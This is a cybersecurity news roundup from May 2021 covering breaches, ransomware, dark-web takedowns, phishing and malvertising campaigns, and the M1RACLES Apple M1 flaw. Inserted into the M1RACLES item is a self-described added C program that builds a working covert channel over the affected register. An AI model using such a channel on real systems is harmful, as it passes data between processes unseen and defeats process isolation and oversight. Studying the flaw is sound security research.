Cybersecurity News – May 28, 2021

Twitter urges Indian government to respect free speech

On Thursday, Twitter responded to India’s new regulations that give authorities greater control over online media and internet platforms. The San Francisco-based social media service received a notice of noncompliance with India’s new rules along with a request to remove posts critical of the government’s handling of the coronavirus and of recently passed agricultural laws. In response, Twitter stated that it, along with many people worldwide, “have concerns with regards to the use of intimidation tactics by the police in response to enforcement of our global terms of service, as well as with core elements of the new IT rules.” Under the new rules, Twitter executives residing in India could face up to seven years in prison and fines if the company fails to remove content that the government considers subversive or a threat to public order and national security.

(The New York Times)

French authorities take down their third dark web marketplace

Last week, French authorities seized their third dark web marketplace in four years by taking control of Le Monde Parallèle (The Parallel World), more commonly known as LMP. French officials said in a press release, “The two site administrators were arrested and LMP’s activities were disrupted.” LMP operated as a marketplace for French-speaking criminals to sell card data, narcotics, forged documents, and weapons. It also served as a support forum and training ground where new criminal groups could find partners for various criminal endeavors across France and Europe.

(The Record)

Japanese government’s data breached after Fujitsu compromise

Several Japanese government agencies, including the Ministry of Foreign Affairs, the Cabinet Office Cyber Security Centre and the Ministry of Land, had files containing system information and email addresses stolen by attackers who compromised Fujitsu’s ProjectWEB software-as-a-service platform. These incidents, along with a similar data breach reported last week at Tokyo’s Narita airport, have increased fears of further supply-chain compromises, since ProjectWEB is widely used across the Japanese private and public sectors. According to a Fujitsu spokesman, “Fujitsu is currently conducting a thorough review of this incident, and we are in close consultation with the Japanese authorities. As a precautionary measure, we have suspended use of this tool, and we have informed any potentially impacted customers.”

(The Register and ThreatPost)

Canada Post suffers data breach after supplier ransomware attack

Canada Post informed 44 of its large commercial customers that a ransomware attack on one of its third-party service providers, Commport Communications, exposed the names and mailing addresses of approximately 950,000 of their customers. Analysis revealed that the attackers also accessed the email addresses and phone numbers of roughly 3% of affected customers. Back in December 2020, a ransomware gang known as Lorenz posted on its leak site that it had breached Commport Communications, and it has since leaked over 35 GB of data allegedly stolen during the attack. At the time of the attack, Canada Post stated that Commport did not believe any of its data had been accessed; it now appears that this was not the case.

(BleepingComputer)

Thanks to our episode sponsor, Sumo Logic

Empower your SOC teams with a single platform that addresses security, compliance and configuration. Register for Sumo Logic’s Modern SOC Summit June 8-9. Whether you are just getting started or want a technical deep dive, this event has something for you. Reserve your spot for this virtual event at sumologic.com and click on the link at the top of the screen.

Russian national jailed for operating stolen data and account platform

This week, the US Department of Justice (DoJ) announced that 30-year-old Russian national Kirill Victorovich Firsov has been jailed for 2.5 years for operating the Deer.io platform, which was designed to sell stolen data and accounts. According to the DoJ, at the time of its seizure Deer.io hosted 3,000 active stores with sales in excess of $17 million. Law enforcement found stolen accounts and personal information, including names, addresses, telephone numbers, and Social Security numbers, that could be accessed for a subscription price of approximately $12 per month, paid in cryptocurrency. Firsov was arrested in New York City after flying into JFK airport from Moscow, Russia.

(ZDNet)

Chinese phishing attack disguises as human rights org to target Uyghurs

Security researchers from Check Point and Kaspersky have partnered to uncover a new Chinese phishing campaign targeting the Uyghur ethnic minority. The attack uses spoofed emails appearing to come from the United Nations Human Rights Council, as well as from a fictitious human rights organization called TCAHF, to lure Uyghurs into installing a Windows backdoor. While the researchers have so far identified only a handful of victims, nearly 12 million Uyghurs live in the north-west Xinjiang region. Check Point’s head of threat intelligence, Lotem Finkelsteen, stated, “We believe that these cyber-attacks are motivated by espionage, with the end-game of the operation being the installation of a backdoor into the computers of high-profile targets in the Uyghur community.”

(Infosecurity Magazine)

Malvertising campaign distributed trojan via Google ads

On Wednesday, researchers from CrowdStrike publicized a malvertising campaign impersonating the AnyDesk remote desktop tool that delivered a malicious installer via rogue Google ads appearing in the search engine’s results pages. The campaign, thought to have begun back in April, uses a malicious file masquerading as the AnyDesk setup executable to download a PowerShell implant that then exfiltrates system data. The researchers indicated, “This malicious use of Google Ads is an effective and clever way to get mass deployment of shells, as it provides the threat actor with the ability to freely pick and choose their target(s) of interest.” Upon notification, Google is said to have taken immediate action to pull the ad in question.

(The Hacker News)

Unpatchable vuln in Apple’s new Mac chip

Developer and researcher Hector Martin has discovered a vulnerability in Apple’s M1 system-on-chip that allows an implementation-defined system register (s3_5_c15_c10_1) to be read and written by unprivileged user-mode applications running at exception level EL0. Two bits of the register are accessible, and because the register is shared by every core in a cluster, any two processes running on that cluster can use it to pass data without going through the operating system. The bug, tracked as CVE-2021-30747, has been named M1RACLES and now has its own website. While Martin notes that the practical impact is minimal, since both processes must cooperate, he has produced proof-of-concept code showing how two programs that have no sanctioned way to communicate can exchange data covertly, bypassing the OS’s process isolation without detection. Martin notes, “The vulnerability is baked into Apple Silicon chips, and cannot be fixed without a new silicon revision.”
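To make the covert channel concrete, here is an added example written for this page; it is not Hector Martin’s published proof of concept. It pushes bytes through the 2-bit EL0-accessible register that M1RACLES describes (s3_5_c15_c10_1 on Apple M1). On macOS running on Apple Silicon the real register is used; on any other host a process-local variable stands in for it so the framing logic can still be exercised. The framing (bit 1 as a clock, bit 0 as data, most significant bit first) and the function names are this example’s own conventions, not the original PoC’s.

```c
/*
 * Added example (not the M1RACLES PoC): a minimal covert channel over a
 * 2-bit register that user mode can read and write. On Apple Silicon the
 * real s3_5_c15_c10_1 register is used; elsewhere a local variable stands in
 * for it. Framing convention (assumed here): bit 1 = clock, bit 0 = data.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#if defined(__APPLE__) && defined(__aarch64__)
/* Real register. Only bits [1:0] are usable, so everything else is masked. */
static uint64_t reg_read(void) {
    uint64_t v;
    __asm__ volatile("mrs %0, s3_5_c15_c10_1" : "=r"(v));
    return v & 3;
}
static void reg_write(uint64_t v) {
    v &= 3;
    __asm__ volatile("msr s3_5_c15_c10_1, %0" : : "r"(v));
}
#else
/* Stand-in for the shared register on hosts without the affected silicon. */
static uint64_t sim_reg;
static uint64_t reg_read(void) { return sim_reg & 3; }
static void reg_write(uint64_t v) { sim_reg = v & 3; }
#endif

#define CLOCK_BIT 0x2
#define DATA_BIT  0x1

/* Receiver state: watches for clock edges and reassembles bytes. */
struct receiver {
    unsigned last_clock;   /* clock bit seen on the previous poll */
    unsigned acc;          /* bits of the byte being assembled */
    unsigned nbits;        /* how many bits are in acc */
    uint8_t *out;          /* output buffer and its capacity/fill */
    size_t cap, len;
};

static void receiver_init(struct receiver *r, uint8_t *out, size_t cap) {
    memset(r, 0, sizeof *r);
    r->out = out;
    r->cap = cap;
    r->last_clock = (reg_read() & CLOCK_BIT) ? 1 : 0;
}

/* One poll of the register. A clock edge means a fresh data bit arrived. */
static int receiver_poll(struct receiver *r) {
    uint64_t v = reg_read();
    unsigned clk = (v & CLOCK_BIT) ? 1 : 0;
    if (clk == r->last_clock)
        return 0;                       /* sender has not toggled yet */
    r->last_clock = clk;
    r->acc = (r->acc << 1) | (unsigned)(v & DATA_BIT);
    if (++r->nbits == 8) {
        if (r->len < r->cap)
            r->out[r->len++] = (uint8_t)r->acc;
        r->acc = 0;
        r->nbits = 0;
    }
    return 1;
}

/* Sender: toggle the clock and place one data bit in the same write. */
static void send_bit(unsigned bit, unsigned *clock) {
    *clock ^= 1;
    reg_write((*clock ? CLOCK_BIT : 0) | (bit & DATA_BIT));
}

/* Single-process walk-through: one bit written, one poll. In the real
   two-process setting the receiver simply spins on receiver_poll(). */
size_t covert_transfer(const uint8_t *msg, size_t n, uint8_t *out, size_t cap) {
    struct receiver r;
    unsigned clock = 0;
    reg_write(0);                       /* known idle state */
    receiver_init(&r, out, cap);
    for (size_t i = 0; i < n; i++)
        for (int b = 7; b >= 0; b--) {
            send_bit((msg[i] >> b) & 1, &clock);
            receiver_poll(&r);
        }
    return r.len;
}

/* Returns 1 if msg comes out of the channel unchanged. */
int roundtrip_ok(const char *msg) {
    size_t n = strlen(msg);
    uint8_t out[64] = {0};
    if (n > sizeof out - 1)
        return 0;
    size_t got = covert_transfer((const uint8_t *)msg, n, out, sizeof out - 1);
    return got == n && memcmp(out, msg, n) == 0;
}

int main(void) {
    const char *secret = "M1RACLES";
    uint8_t out[32] = {0};
    size_t got = covert_transfer((const uint8_t *)secret, strlen(secret), out, sizeof out - 1);
    printf("received %zu bytes: %s\n", got, (char *)out);
    return 0;
}
```

The point of the example is that two bits are enough: one bit carries the payload and the other is toggled so the reader can tell a new symbol from a repeated one, which is exactly why a register with no legitimate purpose for user code still breaks the isolation between processes. Turning this into a real cross-process channel on an M1 requires both processes to be scheduled on the same core cluster and the receiver to spin on the register; that scheduling concern is beyond this single-process illustration.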

(Naked Security)

Sean Kelly
Sean Kelly is a cyber risk professional and leader who thrives on learning, collaborating and helping the business securely advance its mission. Sean is also a musician and outdoor enthusiast who loves spending time with his family and two cats.